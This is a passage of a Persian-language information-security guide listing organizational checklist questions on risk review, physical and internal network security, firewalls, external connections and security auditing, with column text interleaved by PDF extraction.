‫ﭼﻨﺎﻧﻜﻪ ﺩﺭ ﺁﻥ ﻣﺒﺎﺣﺚ ﺩﻳﺪﻳﻢ‪ ،‬ﻃﺮﺡ ﻭﺍﻛﻨﺶ ﺷﺎﻣﻞ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻪ ﻣﻲﺩﺍﺭﺩ؟‬
‫ﻧﺘﺎﻳﺞ ﺍﺭﺯﺷﻴﺎﺑﻲ ﻋﻤﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﻮﺭﺩ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺍﺳﺖ ﻭ ﻃﻴﻔـﻲ ﺍﺯ‬
‫ﺁﻳﺎ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﻪ ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﭘﺮﺩﺍﺯﻳـﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ‬ ‫•‬ ‫ﺍﻗﺪﺍﻣﺎﺕ ﺗﺪﺍﻓﻌﻲ ﺍﻭﻟﻴﻪ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺷﻮﻳﺪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﭘﺎﺑﺮﺟﺎ ﻫﺴﺘﻨﺪ؟‬
‫ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺭﺍ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﺁﻳﺎ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﺪ ﺗﻤﺎﻡ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷـﻤﺎ‬ ‫•‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺯﻳﺎﻥ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺭﺍ ﻧﺼﺐ ﻣﻲﻛﻨﻨـﺪ ﻃﺒـﻖ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻭ ﺭﻭﺍﻟﻬـﺎ ﺍﻣﻨﻴﺘـﻲ‬
‫‪١٨٩‬‬
‫ﺷﺮﻛﺖ ﺷﻤﺎ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ؟‬ ‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺑﺎﺯﻧﮕﺮﻱ ﻣﺨﺎﻃﺮﺍﺕ‬

‫ﺁﻳــﺎ ﭘــﻴﺶ ﺍﺯ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻧــﺮﻡﺍﻓــﺰﺍﺭﻱ ﻭ‬ ‫•‬ ‫ﺁﻳﺎ ﺍﺧﻴﺮﹰﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺻﻮﺭﺕ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ؟ ﺍﻳـﻦ‬ ‫•‬
‫ﻲ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭﻱ‪ ،‬ﺍﺯ ﺭﻓﻊ ﻭ ﺭﺟﻮﻉ ﺗﻤـﺎﻡ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـ ﹺ‬ ‫ﺍﺭﺯﻳﺎﺑﻲ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﺑﻪﺭﻭﺯ ﻣﻲﺷﻮﺩ؟‬
‫ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻣﻲﻛﻨﻴﺪ؟‬ ‫ﺁﻳﺎ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮ ﺣﺴﺐ ﺣﺴﺎﺳﻴﺖ ﻣﺨﺎﻃﺮﺍﺕ )ﻏﻴﺮﺣـﺴﺎﺱ‪،‬‬ ‫•‬
‫ﺁﻳﺎ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺑﺎﺯﺑﻴﻨﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﻣـﻲﺩﻫﻴـﺪ؟‬ ‫•‬ ‫ﺣﺴﺎﺱ‪ ،‬ﻭ ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ( ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﺷﺪﻩﺍﻧﺪ؟‬
‫ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬ ‫ﺁﻳﺎ ﺍﻫﺪﺍﻑ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﺻﻮﻝ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ؟‬ ‫•‬

‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‪ :‬ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ‬ ‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﺯﻣﻮﺩﻥ ﻧﺘﺎﻳﺞ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﺍﺕ‪ ،‬ﺑﺎﺯﺑﻴﻨﻴﻬـﺎﻱ‬ ‫•‬
‫ﻣﻨﻈﻢ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ؟‬
‫ﻣﺒﺤــﺚ ﺍﻣﻨﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﺩﺭ ﺳــﻄﻮﺡ ﻣﺨﺘﻠﻔــﻲ ﺍﺯ ﺟﺰﺋﻴــﺎﺕ ﺩﺭ‬
‫ﺁﻳﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ‬ ‫•‬
‫ﺑﺨﺸﻬﺎﻱ ﺩﻭﻡ )ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻧﻔـﺮﺍﺩﻱ(‪ ،‬ﺳـﻮﻡ‬
‫ﻛــﺎﻫﺶ ﺩﺍﺩﻩ ﺷــﻮﻧﺪ‪ ،‬ﺍﺯ ﻣﻤﻴﺰﻫــﺎﻱ ﺧــﺎﺭﺝ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ‬
‫)ﻫﻤﻴﻦ ﺑﺨﺶ( ﻭ ﭘﻨﺠﻢ )ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﻭ ﻓﻨـﻲ(‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؟‬
‫ﭘﻮﺷﺶ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻓﻨﻲ‪ ،‬ﺑﻌﻀﻲ ﺯﻣﻴﻨﻪﻫﺎ ﺑﺎﻳـﺪ ﺍﺯ‬
‫ﻣﻨﻈﺮ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﭘﻮﺷﺶ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ؛ ﻣﺜﻞ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ‪،‬‬ ‫ﺁﻳﺎ ﺗﻤﺎﻡ ﻛﺎﺭﻣﻨـﺪﺍﻥ )ﺣﺘـﻲ ﻣـﺪﻳﺮﺍﻥ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﺳﻴـﺴﺘﻢ( ﺑـﺮ‬ ‫•‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ‪ ،‬ﻭ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎ‪ .‬ﻓﻬﺮﺳﺘﻬﺎﻱ‬ ‫ﺍﺳﺎﺱ ﺍﻫﺪﺍﻑ ﺍﻣﻨﻴﺘـﻲ ﻣـﻮﺭﺩ ﺍﺭﺯﺷـﻴﺎﺑﻲ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﻭ‬
‫ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﻬﺖ ﻛﻤﻚ ﺑﻪ ﺣﻔﻆ ﻣﻨﺎﺑﻊ ﻓﻴﺰﻳﻜـﻲ ﻳـﻚ ﻣﺤـﻴﻂ‬ ‫ﻣﻨﺼﻮﺏ ﺷﺪﻩﺍﻧﺪ؟‬
‫ﺷﺒﻜﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪.‬‬

‫‪ ۱۹۰‬ﻫﻤﺎﻥ ﻣﻨﺒﻊ‪ ،‬ﻓﺼﻞ ﺩﻭﻡ‪ ،‬ﺍﻣﻨﻴﺖ ﻣﺒﺘﻜﺮﺍﻧﻪ‪ ،‬ﺹ ‪۳۲‬‬ ‫‪ ۱۸۹‬ﻫﻤﺎﻥ ﻣﻨﺒﻊ‪ ،‬ﻓﺼﻞ ﺷﺸﻢ‪ ،‬ﺍﻣﻨﻴﺖ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻧﺸﺪﻩ‪ ،‬ﺹ ‪۹۵‬‬
‫‪٢٠١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺁﻳﺎ ﻛﺴﻲ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻧﺠﺎﻡ ﺁﺯﻣﻮﻥ ﻧﻔـﻮﺫ‪ ١٩٣‬ﺭﻭﻱ ﺩﻳـﻮﺍﺭﺓ‬ ‫•‬ ‫‪١٩١‬‬
‫ﻓﻬﺮﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ‬
‫ﺁﺗﺶ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ؟‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻌﻴﻦ‬ ‫•‬
‫ﺁﻳﺎ ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺩﻳـﻮﺍﺭﺓ‬ ‫•‬ ‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﺁﺗﺶ )ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ( ﺑﺮ ﻋﻬﺪﺓ ﻛﻴﺴﺖ؟‬
‫ﺁﻳﺎ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺷﺎﻣﻞ ﻣﺠﻮﺯﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ‬ ‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﻣﻮﺭ ﺭﺍﻫﺒﺮﻱ‪ ،‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‪ ،‬ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺩﻳـﻮﺍﺭﺓ‬ ‫•‬ ‫ﻓﺎﻳﻠﻬﺎ‪ ،‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﻭ ﻭﺻﻠﻪﻫﺎ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﺁﺗﺶ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫ﺁﻳﺎ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻩﺍﻳﺪ؟‬ ‫•‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺑـﻪ ﻧﻘـﺶ ﺧـﻮﺩ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺍﻣﻨﻴـﺖ ﻭ ﻧﻘـﺶ‬ ‫•‬
‫ﺁﻳﺎ ﺳﻴﺎﺳﺘﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬ ‫•‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﻨﺪ ﻭﺍﻗﻔﻨﺪ؟‬
‫ﺁﻳﺎ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺭﻧﺪ؟‬ ‫•‬
‫ﺁﻳﺎ ﻧﻘﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻓـﻮﺭﻳﺘﻲ ﺑﻮﺿـﻮﺡ ﻭ ﺑـﺼﻮﺭﺕ‬ ‫•‬
‫ﺭﺳﻤﻲ ﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ؟‬ ‫ﺁﻳﺎ ﺣﺴﺎﺑﻬﺎﻱ ﭘﻴﺶﻓﺮﺽ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻮﺟﻮﺩ ﻫـﺴﺘﻨﺪ‬ ‫•‬
‫ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ؟‬
‫ﺁﻳﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﻭﺍﻟﻬـﺎﻱ ﭘﻴـﺸﮕﻴﺮﺍﻧﺔ‬ ‫•‬
‫ﻣﻌﻴﻨﻲ ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ؟‬ ‫ﺁﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﭘﻴﺶﻓـﺮﺽ "‪"Guest‬‬ ‫•‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻃﺒﻖ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻣﻤﻨﻮﻉ ﺷﺪﻩ ﺍﺳﺖ؟‬


‫ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻬـﺎﺟﻢﻳـﺎﺏ ﺭﻭﻱ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺷـﺒﻜﻪ‬ ‫•‬
‫ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ؟‬ ‫ﺁﻳﺎ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﻧﺪ ﺑـﺼﻮﺭﺕ‬ ‫•‬
‫ﻣﻨﻈﻢ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﺁﻳـــﺎ ﻧـــﺮﻡﺍﻓـــﺰﺍﺭ ﻣﻤﻴـــﺰﻱ ﺭﻭﻱ ﺗﻤــﺎﻡ ﺳﻴـــﺴﺘﻤﻬﺎﻱ‬ ‫•‬
‫ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ؟‬ ‫ﺁﻳﺎ ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ ﺍﺯ ﻓﺮﺁﻳﻨﺪ ﻧﺼﺐ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﻭﺻﻠﻪ ﻫﺎﻱ‬ ‫•‬
‫ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳﺪ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ﺩﺭ ﺗﻤﺎﻡ ﻧﻘﺎﻁ ﻭﺭﻭﺩ ﺷﺒﻜﻪ ﻧﺼﺐ‬ ‫•‬
‫ﺷﺪﻩ ﺍﺳﺖ؟‬ ‫ﺁﻳﺎ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﺎ ﺷﻤﺎﺳـﺖ‬ ‫•‬
‫ﺑﺮﺍﻱ ﺷﻜﺴﺘﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭﻱ ﻛـﻪ ﺑـﻪ ﺳـﺎﺩﮔﻲ ﻗﺎﺑـﻞ‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﻓﺮﺁﻳﻨـﺪﻫﺎ‪ ،‬ﺗﺠﺮﺑﻴـﺎﺕ ﻧﻔـﻮﺫ ﺑـﻪﺍﺷـﺘﺮﺍﻙ‬ ‫•‬
‫ﺣﺪﺱ ﻫﺴﺘﻨﺪ ﺗﻼﺵ ﻣﻲﻛﻨﻴﺪ؟ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬
‫ﮔﺬﺍﺷﺘﻪ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﺁﻳﺎ ﻣﺮﺍﻗﺐ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﻓﺎﻳﻠﻬﺎ ﻫﺴﺘﻴﺪ؟ ﻫﺮ ﭼﻨـﺪ‬ ‫•‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ‬ ‫ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺗﺄﻳﻴـﺪ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ‬ ‫•‬ ‫ﺁﻳﺎ ﻫﻨﮕﺎﻡ ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ ﺟﻮﺍﻧـﺐ ﺍﺣﺘﻴـﺎﻁ ﺭﺍ‬ ‫•‬
‫ﺧﺎﺭﺟﻲ ﺩﺧﻴﻞ ﺍﺳﺖ؟‬ ‫ﺭﻋﺎﻳﺖ ﻣﻲﻛﻨﻴﺪ؟‬
‫ﺁﻳﺎ ﻛﺴﻲ ﺍﺗﺼﺎﻻﺕ ﺑﻪ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺩﻧﺒﺎﻝ ﻣﻲﻛﻨﺪ؟‬ ‫•‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺷﺒﻜﻪﻫﺎﻱ ﺧـﺎﺭﺟﻲ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺯ ﺗﻌﺪﺍﺩ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻧﻲ ﻛﻪ ﻣﺘـﺼﻞ‬ ‫•‬ ‫‪١٩٢‬‬
‫ﺁﺗﺶ‬
‫ﺑﻪ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻣﻄﻠﻌﻨﺪ؟‬
‫ﺁﻳﺎ ﻧﻘﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺭﻭﺷـﻨﻲ ﺗﻌﺮﻳـﻒ‬ ‫•‬
‫ﺁﻳﺎ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺷﺒﻜﻪ ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ؟‬ ‫•‬ ‫ﺷﺪﻩﺍﻧﺪ؟‬
‫ﺁﻳﺎ ﭘﻴﺶ ﺍﺯ ﺗﺄﻳﻴﺪ ﺍﺗﺼﺎﻻﺕ ﺧﺎﺭﺟﻲ‪ ،‬ﻧﻴﺎﺯ ﻭﺍﻗﻌﻲ ﺑـﻪ ﺁﻧﻬـﺎ‬ ‫•‬ ‫ﺁﻳﺎ ﻓـﺮﺩﻱ ﺑـﺼﻮﺭﺕ ﻣـﻨﻈﻢ ﺗﻨﻈﻴﻤـﺎﺕ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺭﺍ‬ ‫•‬
‫ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؟‬ ‫ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﻛﻨﺪ؟ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬

‫‪ ۱۹۱‬ﻫﻤﺎﻥ ﻣﻨﺒﻊ‪ ،‬ﻓﺼﻞ ﻫﺸﺘﻢ‪ ،‬ﺍﻣﻨﻴﺖ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ‪ ،‬ﺹ ‪۱۲۱‬‬


‫‪193 Penetration Testing‬‬ ‫‪ ۱۹۲‬ﻫﻤﺎﻥ ﻣﻨﺒﻊ‪ ،‬ﻓﺼﻞ ﻫﻔﺘﻢ‪ ،‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻣﻨﻴﺖ‪ ،‬ﺹ ‪۱۰۹‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٠٢‬‬

‫‪١٩٤‬‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺭﻭﺍﻟﻬﺎﻱ ﺑﺎﺯﺑﻴﻨﻲ‬ ‫ﺁﻳﺎ ﺷﺮﻛﺖ ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﺍﺗـﺼﺎﻻﺕ ﺧـﺎﺭﺟﻲ ﺑـﺼﻮﺭﺕ‬ ‫•‬
‫ﻣﻨﻈﻢ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﻛﻨﺪ؟‬
‫ﺁﻳﺎ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲ ﺑﺮﺍﻱ ﺑﺎﺯﺑﻴﻨﻲ ﺩﺍﺭﻳﺪ؟‬ ‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺍﺗـﺼﺎﻝ ﺍﻓـﺮﺍﺩ ﻳـﺎ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ‬ ‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺍﻣﻨﻴﺖ‪ ،‬ﺭﻭﺍﻟﻬـﺎﻱ ﻛﺘﺒـﻲ ﺑـﺎﺯﺑﻴﻨﻲ ﺗﻬﻴـﻪ‬ ‫•‬
‫ﻣﺴﺘﻌﻔﻲ‪ ،‬ﺭﻭﺍﻝ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﻛﺮﺩﻩﺍﻳﺪ؟‬
‫ﺁﻳــﺎ ﺑــﺮﺍﻱ ﻧــﺼﺐ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ‪ ،‬ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ‬ ‫•‬
‫ﺁﻳﺎ ﺑﺎﺯﺑﻴﻨﻲﻫﺎ ﻃﺒﻖ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬ ‫•‬
‫ﻣﺨﺼﻮﺹ ﻣﻮﺟﻮﺩ ﺍﺳﺖ؟‬
‫ﻣﻲﺭﺳﻨﺪ؟‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻻﺕ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ‬ ‫•‬
‫ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎﺯﺑﻴﻨﻲ ﺭﻭﻱ ﻫﻤﺔ ﺍﻧـﻮﺍﻉ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ‬ ‫•‬
‫ﺧﺎﺭﺟﻲ ﺳﻴﺎﺳﺖ ﻭ ﺭﻭﺍﻝ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﺷﻤﺎ )‪ (Unix/Linux, Mac, Windows‬ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ؟‬
‫ﺁﻳــﺎ ﻫﻤــﺔ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﺍﺗــﺼﺎﻻﺕ‬ ‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺧﺮﻳـﺪ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺎﺯﺑﻴﻨﻲ‪ ،‬ﺑﻮﺩﺟـﺔ‬ ‫•‬
‫ﺑﺼﻮﺭﺕ ﺍﺟﺒﺎﺭﻱ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﻣﻨﺎﺳﺐ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ؟‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺑﺎ ﻓـﺮﺍﻫﻢ ﻛـﺮﺩﻥ ﺍﻣﻜـﺎﻥ ﺁﻣـﻮﺯﺵ ﺻـﺤﻴﺢ‬ ‫•‬ ‫ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺖ‬
‫ﻣﻤﻴﺰﺍﻥ‪ ،‬ﺍﺯ ﻓﺮﺁﻳﻨـﺪ ﺑـﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴـﺖ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﻨﺎﺳـﺐ‬
‫ﺩﺭ ﻋﻴﻦ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻘـﺎﺩﻳﺮ ﻫﻨﮕﻔﺘـﻲ ﺯﻣـﺎﻥ ﻭ ﭘـﻮﻝ ﺭﺍ‬
‫ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﻧﺪ؟‬
‫ﺟﻬﺖ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺁﻣﻮﺯﺵ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻭ‬
‫ﺗﻮﺟــﻪ ﺑــﻪ ﻣــﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺍﻣﻨﻴﺘــﻲ ﺻــﺮﻑ ﻣــﻲﻛﻨــﺪ‪،‬‬
